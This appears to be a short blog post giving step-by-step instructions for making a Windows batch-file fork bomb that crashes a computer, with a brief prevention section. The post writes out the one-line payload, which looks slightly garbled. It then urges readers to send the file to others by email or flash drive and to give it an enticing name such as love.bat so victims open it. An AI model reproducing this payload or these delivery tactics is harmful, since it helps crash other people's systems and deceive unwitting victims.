HOW TO CREATE A FORK BOMB VIRUS THAT CRASHES SYTEM IN 3MINS This is a great bomb that needs to be handled with care!for internent wizards i want you to be careful,because i wont be responsible for whatever if you are caught! your notepad on pc and inpute this code %0|% on 'save as' 3.delete the .txt and replace with .bat and save 4.once anyone double clicks on it,the system will automatically crash NOTE; You can send it via mail or from a flash drive to anyone's pc,one's the person hit the file,forget it to gain attraction to the file you can save it as love.bat or any captivating words! HOW TO PREVENT; 1.Do not open any .bat file; 2.what if you are a victim or you want to trash the virus out on a system you've crash? Once you on your pc quickly press clt+alt+delete key on your keyboard then start the task manager 3.Next click on process tab and locate the .bat or anyname.bat,then click on the end process and thats all. IF YOU HAVE ANY PROBLEM,KINDLY CALL 08174112595,OR EMAIL Unknown 15:19:00 Share This: Facebook Twitter Google+ Stumble Digg Email ThisBlogThis!Share to XShare to Facebook